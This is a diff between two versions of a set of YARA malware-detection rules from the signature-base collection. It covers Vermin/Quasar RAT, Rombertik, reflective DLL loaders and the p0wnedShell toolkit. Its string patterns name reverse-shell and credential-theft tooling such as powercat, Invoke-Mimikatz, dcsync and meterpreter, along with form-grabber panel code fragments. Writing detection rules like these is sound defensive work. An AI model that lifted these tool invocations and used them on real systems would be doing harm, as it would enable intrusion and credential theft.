+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_vermin.yar#L11-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f65fa80638e6a8bf8c5afb3dbe1262572ca0a7c56507369934ac3d958f3e6267"
+		logic_hash = "4b2c8695a053a714e97f3e108f0f359d9e49151297a21e460b3201d8f4e72a89"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2"
-		hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737"
+		hash1 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
+		hash2 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
 
 	strings:
-		$x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" fullword ascii
-		$s1 = "listen above" fullword wide
-		$s2 = "familycould cost" fullword wide
-		$s3 = "SetSystemTimeAdjustment" fullword ascii
-		$s4 = "PeekNamedPipe" fullword ascii
+		$a1 = "ping -n 20 localhost > nul" fullword wide
+		$s2 = "HandleDownloadAndExecuteCommand" fullword ascii
+		$s3 = "DownloadAndExecute" fullword ascii
+		$s4 = "UploadAndExecute" fullword ascii
+		$s5 = "ShellCommandResponse" fullword ascii
+		$s6 = "Select * From Win32_ComputerSystem" fullword wide
+		$s7 = "Process could not be started!" fullword wide
+		$s8 = ".Core.RemoteShell" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and $a1 and 3 of them
 }
-rule SIGNATURE_BASE_SHIFU_Banking_Trojan : FILE
+rule SIGNATURE_BASE_Vermin_Keylogger_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects SHIFU Banking Trojan"
+		description = "Detects Vermin Keylogger"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0d57a2b-31cc-5af0-84c3-5d178e2d244d"
-		date = "2015-10-31"
+		id = "52192ea1-bb3d-52da-ba18-0645262745e2"
+		date = "2018-01-29"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/52n8WE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_shifu_trojan.yar#L29-L63"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_quasar_vermin.yar#L35-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "01f5217ee4e81b0b2ff37ccc7eed353ace26aa68538cce5bc207c0c071f0850a"
-		score = 70
+		logic_hash = "a8afe017f32400e1e498d23746f5cb59c3c67f6abefe9b2e36bec81ca82ecfed"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0"
-		hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5"
-		hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d"
-		hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485"
-		hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f"
-		hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b"
-		hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4"
-		hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290"
-		hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8"
-		hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05"
-		hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123"
-		hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9"
-		hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503"
-		hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d"
+		hash1 = "74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d"
+		hash2 = "e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7"
+		hash3 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
+		hash4 = "4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da"
+		hash5 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
+		hash6 = "2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef"
 
 	strings:
-		$x1 = "\\Gather\\Dividerail.pdb" ascii
-		$s0 = "\\payload\\payload.x86.pdb" ascii
-		$s1 = "USER_PRIV_GUEST" fullword wide
-		$s2 = "USER_PRIV_ADMIN" fullword wide
-		$s3 = "USER_PRIV_USER" fullword wide
-		$s4 = "PPSWVPP" fullword ascii
-		$s5 = "WinSCard.dll" fullword ascii
+		$x1 = "_keyloggerTaskDescription" ascii
+		$x2 = "_keyloggerTaskAuthor" ascii
+		$x3 = "GetKeyloggerLogsResponse" fullword ascii
+		$x4 = "GetKeyloggerLogs" fullword ascii
+		$x5 = "ExecuteUninstallKeyLoggerTask" fullword ascii
+		$x6 = "ExecuteInstallKeyLoggerTask" fullword ascii
+		$x7 = ":\\Projects\\Vermin\\KeyboardHookLib\\" ascii
+		$x8 = ":\\Projects\\Vermin\\CryptoLib\\" ascii
+		$s1 = "<RunHidden>k__BackingField" fullword ascii
+		$s2 = "set_SystemInfos" fullword ascii
+		$s3 = "set_RunHidden" fullword ascii
+		$s4 = "set_RemotePath" fullword ascii
+		$s5 = "ExecuteShellCommandTask" fullword ascii
+		$s6 = "Client.exe" fullword wide
+		$s7 = "xClient.Core.ReverseProxy.Packets" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $x1 or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 3 of them )
 }
-
-rule SIGNATURE_BASE_SUSP_ENV_Folder_Root_File_Jan23_1 : SCRIPT FILE
+rule SIGNATURE_BASE_Rombertik_Carbongrabber : FILE
 {
 	meta:
-		description = "Detects suspicious file path pointing to the root of a folder easily accessible via environment variables"
+		description = "Detects CarbonGrabber alias Rombertik - file Copy#064046.scr"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6067d822-5c1b-5b86-863c-fdcfa37da665"
-		date = "2023-01-11"
+		id = "b3aee336-9f3b-5fae-928d-8357408a7b69"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_indicators.yar#L3-L22"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5355ae567e6255e22f566bae9fe50f4995bafba07c261461d37d5b8ba200d33a"
-		score = 70
-		quality = 83
-		tags = "SCRIPT, FILE"
+		logic_hash = "ddc3ebcc460909a4afc9994cae53c9b7642f92ab6f16e2653f6b2d5002a33cda"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f9b26b90311e62662c5946a1ac600d2996d3758"
+		hash2 = "aeb94064af2a6107a14fd32f39cb502e704cd0ab"
+		hash3 = "c2005c8d1a79da5e02e6a15d00151018658c264c"
+		hash4 = "98223d4ec272d3a631498b621618d875dd32161d"
 
 	strings:
-		$xr1 = /%([Aa]pp[Dd]ata|APPDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
-		$xr2 = /%([Pp]ublic|PUBLIC)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
-		$xr4 = /%([Pp]rogram[Dd]ata|PROGRAMDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
-		$fp1 = "perl -MCPAN " ascii
-		$fp2 = "CCleaner" ascii
+		$x1 = "ZwGetWriteWatch" fullword ascii
+		$x2 = "OutputDebugStringA" fullword ascii
+		$x3 = "malwar" fullword ascii
+		$x4 = "sampl" fullword ascii
+		$x5 = "viru" fullword ascii
+		$x6 = "sandb" fullword ascii
 
 	condition:
-		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Sentinelone_Remotepotato0_Privesc : FILE
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel_Installscript : FILE
 {
 	meta:
-		description = "Detects RemotePotato0 binary"
-		author = "SentinelOne"
-		id = "f6dffd6b-e794-5c4a-9700-5c2022168f44"
-		date = "2021-04-26"
+		description = "Detects CarbonGrabber alias Rombertik panel install script - file install.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_remote_potato0.yar#L2-L17"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L33-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f3a3a917908af6260f40b217f966750a095140abb6bf85cf3a728725bc16996f"
+		hash = "cd6c152dd1e0689e0bede30a8bd07fef465fbcfa"
+		logic_hash = "a0edc53aea21bc317f510a4a463ca677d9dc1ec234ca9824bc46711c851f2ccc"
 		score = 75
-		quality = 79
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$import1 = "CoGetInstanceFromIStorage"
-		$istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
-		$meow_header = { 4d 45 4f 57 }
-		$clsid1 = "{11111111-2222-3333-4444-555555555555}" wide ascii
-		$clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
+		$s0 = "$insert = \"INSERT INTO `logs` (`id`, `ip`, `name`, `host`, `post`, `time`, `bro" ascii
+		$s3 = "`post` text NOT NULL," fullword ascii
+		$s4 = "`host` text NOT NULL," fullword ascii
+		$s5 = ") ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;\" ;" fullword ascii
+		$s6 = "$db->exec($columns); //or die(print_r($db->errorInfo(), true));;" fullword ascii
+		$s9 = "$db->exec($insert);" fullword ascii
+		$s10 = "`browser` text NOT NULL," fullword ascii
+		$s13 = "`ip` text NOT NULL," fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and $import1 and $istorage_clsid and $meow_header and 1 of ( $clsid* )
+		filesize < 3KB and all of them
 }
-
-rule SIGNATURE_BASE_Reflectiveloader : FILE
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel : FILE
 {
 	meta:
-		description = "Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended"
+		description = "Detects CarbonGrabber alias Rombertik Panel - file index.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8a601d7-b99a-59dc-bfc7-bf0e35b5d8bd"
-		date = "2017-07-17"
-		modified = "2021-03-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L14-L41"
+		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
+		date = "2015-05-05"
+		modified = "2023-12-05"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L55-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4d839674f8d8181b11af964a7c84a9eb8f07623500dd2695fca9ca3b15c247e2"
-		score = 70
+		hash = "e6e9e4fc3772ff33bbeeda51f217e9149db60082"
+		logic_hash = "8b7fde3c3894b7aa83e05f6a1b820195276f8738fde218485c0465afaed88427"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		nodeepdive = 1
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "ReflectiveLoader" fullword ascii
-		$x2 = "ReflectivLoader.dll" fullword ascii
-		$x3 = "?ReflectiveLoader@@" ascii
-		$x4 = "reflective_dll.x64.dll" fullword ascii
-		$x5 = "reflective_dll.dll" fullword ascii
-		$fp1 = "Sentinel Labs, Inc." wide
-		$fp2 = "Panda Security, S.L." wide ascii
+		$s0 = "echo '<meta http-equiv=\"refresh\" content=\"0;url=index.php?a=login\">';" fullword ascii
+		$s1 = "echo '<meta http-equiv=\"refresh\" content=\"2;url='.$website.'/index.php?a=login" ascii
+		$s2 = "header(\"location: $website/index.php?a=login\");" fullword ascii
+		$s3 = "$insertLogSQL -> execute(array(':id' => NULL, ':ip' => $ip, ':name' => $name, ':" ascii
+		$s16 = "if($_POST['username'] == $username && $_POST['password'] == $password){" fullword ascii
+		$s17 = "$SQL = $db -> prepare(\"TRUNCATE TABLE `logs`\");" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or pe.exports ( "ReflectiveLoader" ) or pe.exports ( "_ReflectiveLoader@4" ) or pe.exports ( "?ReflectiveLoader@@YGKPAX@Z" ) ) and not 1 of ( $fp* )
+		filesize < 46KB and all of them
 }
-
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_1 : FILE
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder : FILE
 {
 	meta:
-		description = "Detects Reflective DLL Loader"
+		description = "Detects CarbonGrabber alias Rombertik Builder - file Builder.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a2674f8-5fdb-5a4d-a2b9-41e874939616"
-		date = "2017-08-20"
+		id = "3233c139-ac06-576c-9870-51306d5aa385"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L53-L76"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L75-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ad012dda538d37242c92c6ed16a0fb1cd9252a2884387f8e7d9c80b041c8fea"
+		hash = "b50ecc0ba3d6ec19b53efe505d14276e9e71285f"
+		logic_hash = "e9d13913ee03926920eba33a4dac2a6e9aeaaa54949c5bfea8dd956cf233abae"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f2f85855914345eec629e6fc5333cf325a620531d1441313292924a88564e320"
 
 	strings:
-		$x1 = "\\Release\\reflective_dll.pdb" ascii
-		$x2 = "reflective_dll.x64.dll" fullword ascii
-		$s3 = "DLL Injection" fullword ascii
-		$s4 = "?ReflectiveLoader@@YA_KPEAX@Z" fullword ascii
+		$s0 = "c:\\users\\iden\\documents\\visual studio 2010\\Projects\\FormGrabberBuilderC++" ascii
+		$s1 = "Host(www.panel.com): " fullword ascii
+		$s2 = "Path(/form/index.php?a=insert): " fullword ascii
+		$s3 = "FileName: " fullword ascii
+		$s4 = "~Rich8" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "4bf489ae7d1e6575f5bb81ae4d10862f" or pe.exports ( "?ReflectiveLoader@@YA_KPEAX@Z" ) or ( 1 of ( $x* ) or 2 of them ) ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 35KB and all of them
 }
-rule SIGNATURE_BASE_DLL_Injector_Lynx : FILE
+rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder_Server : FILE
 {
 	meta:
-		description = "Detects Lynx DLL Injector"
+		description = "Detects CarbonGrabber alias Rombertik Builder Server - file Server.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a4c9949-c701-5ae2-a8b1-3ef0b08c1c04"
-		date = "2017-08-20"
+		id = "742003a2-3716-5ad9-a720-b9e2be71554a"
+		date = "2015-05-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L78-L100"
+		reference = "http://blogs.cisco.com/security/talos/rombertik"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rombertik_carbongrabber.yar#L94-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1904b152c42126abd87671747dc2733e2a5e2a01ab55346c131fb430fe5ba58e"
+		hash = "895fab8d55882eac51d4b27a188aa67205ff0ae5"
+		logic_hash = "693c92128166c72aded066fa66eef906a9f6027c65b889f3a487a38382f29982"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d594f60e766e0c3261a599b385e3f686b159a992d19fa624fad8761776efa4f0"
 
 	strings:
-		$x1 = " -p <TARGET PROCESS NAME> | -u <DLL PAYLOAD> [--obfuscate]" fullword wide
-		$x2 = "You've selected to inject into process: %s" fullword wide
-		$x3 = "Lynx DLL Injector" fullword wide
-		$x4 = "Reflective DLL Injector" fullword wide
-		$x5 = "Failed write payload: %lu" fullword wide
-		$x6 = "Failed to start payload: %lu" fullword wide
-		$x7 = "Injecting payload..." fullword wide
+		$s0 = "C:\\WINDOWS\\system32\\svchost.exe" fullword ascii
+		$s3 = "Software\\Microsoft\\Windows\\Currentversion\\RunOnce" fullword ascii
+		$s4 = "chrome.exe" fullword ascii
+		$s5 = "firefox.exe" fullword ascii
+		$s6 = "chrome.dll" fullword ascii
+		$s7 = "@KERNEL32.DLL" fullword wide
+		$s8 = "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome" ascii
+		$s10 = "&post=" fullword ascii
+		$s11 = "&host=" fullword ascii
+		$s12 = "Ws2_32.dll" fullword ascii
+		$s16 = "&browser=" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and 8 of them
 }
+rule SIGNATURE_BASE_ACE_Containing_EXE
+{
+	meta:
+		description = "Looks for ACE Archives containing an exe/scr file"
+		author = "Florian Roth (Nextron Systems) - based on Nick Hoffman' rule - Morphick Inc"
+		id = "0756f0e7-39f1-572d-a77d-1f7826332360"
+		date = "2015-09-09"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ace_with_exe.yar#L2-L20"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "27fba0db7a98fbaf4b3710a9e411ed74860099c133a2e83ddf368ae2fef3c288"
+		score = 50
+		quality = 83
+		tags = ""
 
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_2 : FILE
+	strings:
+		$header = { 2a 2a 41 43 45 2a 2a }
+		$extensions1 = ".exe"
+		$extensions2 = ".EXE"
+		$extensions3 = ".scr"
+		$extensions4 = ".SCR"
+
+	condition:
+		$header at 7 and for any of ( $extensions* ) : ( $ in ( 81 .. ( 81 + uint16( 79 ) ) ) )
+}
+rule SIGNATURE_BASE_P0Wnedpowercat : FILE
 {
 	meta:
-		description = "Detects Reflective DLL Loader - suspicious - Possible FP could be program crack"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5948d9ba-e655-5b11-ad74-f650b3a753e7"
-		date = "2017-08-20"
+		id = "059a8e58-7b7e-582e-ba4a-80e4dffe9b5e"
+		date = "2017-01-14"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L102-L128"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f01b2cf754c3527d0d7fd44c28d3cdb9327762572b43a7d6f7667e5c2a26ab17"
-		score = 60
+		logic_hash = "5882d0f91f237d2abe1149421db0e217e6dfcca70130d346a70d5c851eca085f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c2a7a2d0b05ad42386a2bedb780205b7c0af76fe9ee3d47bbe217562f627fcae"
-		hash2 = "b90831aaf8859e604283e5292158f08f100d4a2d4e1875ea1911750a6cb85fe0"
+		hash1 = "6a3ba991d3b5d127c4325bc194b3241dde5b3a5853b78b4df1bce7cbe87c0fdf"
 
 	strings:
-		$x1 = "\\ReflectiveDLLInjection-master\\" ascii
-		$s2 = "reflective_dll.dll" fullword ascii
-		$s3 = "DLL injection" fullword ascii
-		$s4 = "_ReflectiveLoader@4" ascii
-		$s5 = "Reflective Dll Injection" fullword ascii
+		$x1 = "Now if we point Firefox to http://127.0.0.1" fullword ascii
+		$x2 = "powercat -l -v -p" fullword ascii
+		$x3 = "P0wnedListener" fullword ascii
+		$x4 = "EncodedPayload.bat" fullword ascii
+		$x5 = "powercat -c " fullword ascii
+		$x6 = "Program.P0wnedPath()" ascii
+		$x7 = "Invoke-PowerShellTcpOneLine" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "59867122bcc8c959ad307ac2dd08af79" or pe.exports ( "_ReflectiveLoader@4" ) or 2 of them ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x7375 and filesize < 150KB and 1 of them ) or ( 2 of them )
 }
-
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_3 : FILE
+rule SIGNATURE_BASE_Hacktool_Strings_P0Wnedshell : FILE
 {
 	meta:
-		description = "Detects Reflective DLL Loader"
-		author = "Florian Roth (Nextron Systems)"
-		id = "91842f58-5205-533d-9e97-a1e84fbf259d"
-		date = "2017-08-20"
-		modified = "2022-12-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L130-L154"
+		description = "Detects strings found in Runspace Post Exploitation Toolkit"
+		author = "Florian Roth"
+		id = "0846039d-1e00-5224-9560-55ab18034d54"
+		date = "2017-01-14"
+		modified = "2023-02-10"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L31-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4fbba94e6d3dc7b4976c90c0f95683c548f3c444bf5eaf0a7c55d96150978a67"
+		logic_hash = "faec8f0af877f1a80ff994e08c756728cea5f58000f7124c1a6e7e4c86e7f5c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d10e4b3f1d00f4da391ac03872204dc6551d867684e0af2a4ef52055e771f474"
+		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
+		nodeepdive = 1
 
 	strings:
-		$s1 = "\\Release\\inject.pdb" ascii
-		$s2 = "!!! Failed to gather information on system processes! " fullword ascii
-		$s3 = "reflective_dll.dll" fullword ascii
-		$s4 = "[-] %s. Error=%d" fullword ascii
-		$s5 = "\\Start Menu\\Programs\\reflective_dll.dll" ascii
+		$x1 = "Invoke-TokenManipulation" fullword ascii
+		$x2 = "windows/meterpreter" fullword ascii
+		$x3 = "lsadump::dcsync" fullword ascii
+		$x4 = "p0wnedShellx86" fullword ascii
+		$x5 = "p0wnedShellx64" fullword ascii
+		$x6 = "Invoke_PsExec()" fullword ascii
+		$x7 = "Invoke-Mimikatz" fullword ascii
+		$x8 = "Invoke_Shellcode()" fullword ascii
+		$x9 = "Invoke-ReflectivePEInjection" ascii
+		$fp1 = "Sentinel Labs, Inc." wide
+		$fp2 = "Copyright Elasticsearch B.V." ascii wide
+		$fp3 = "Attack Information: Invoke-Mimikatz" ascii
+		$fp4 = "a30226 || INDICATOR-SHELLCODE Metasploit windows/meterpreter stage transfer attempt"
+		$fp5 = "use strict"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "26ba48d3e3b964f75ff148b6679b42ec" or 2 of them ) ) or ( 3 of them )
+		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_4 : FILE
+rule SIGNATURE_BASE_P0Wnedpotato
 {
 	meta:
-		description = "Detects Reflective DLL Loader"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2a28ea6-a3f7-5ceb-86fd-1e5b7f916a41"
-		date = "2017-08-20"
+		id = "2c2378e3-b948-5325-9afd-76424a7130b1"
+		date = "2017-01-14"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_loaders.yar#L156-L176"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L64-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b988ea586589dced18f2165eff431be897b3e96fce2d124f5f41d52b520ccd76"
+		logic_hash = "d9107db6c6460429358a2f9f1f47d103e96811152e8d03517871ff0c66578d05"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "205b881701d3026d7e296570533e5380e7aaccaa343d71b6fcc60802528bdb74"
-		hash2 = "f76151646a0b94024761812cde1097ae2c6d455c28356a3db1f7905d3d9d6718"
+		hash1 = "aff2b694a01b48ef96c82daf387b25845abbe01073b76316f1aab3142fdb235b"
 
 	strings:
-		$x1 = "<H1>&nbsp;>> >> >> Keylogger Installed - %s %s << << <<</H1>" fullword ascii
-		$s1 = "<H3> ----- Running Process ----- </H3>" fullword ascii
-		$s2 = "<H2>Operating system: %s<H2>" fullword ascii
-		$s3 = "<H2>System32 dir:  %s</H2>" fullword ascii
+		$x1 = "Invoke-Tater" fullword ascii
+		$x2 = "P0wnedListener.Execute(WPAD_Proxy);" fullword ascii
+		$x3 = " -SpooferIP " ascii
+		$x4 = "TaterCommand()" ascii
+		$x5 = "FileName = \"cmd.exe\"," fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+		1 of them
 }
-
-rule SIGNATURE_BASE_Freemilk_APT_Mal_1 : FILE
+rule SIGNATURE_BASE_P0Wnedexploits
 {
 	meta:
-		description = "Detects malware from FreeMilk campaign"
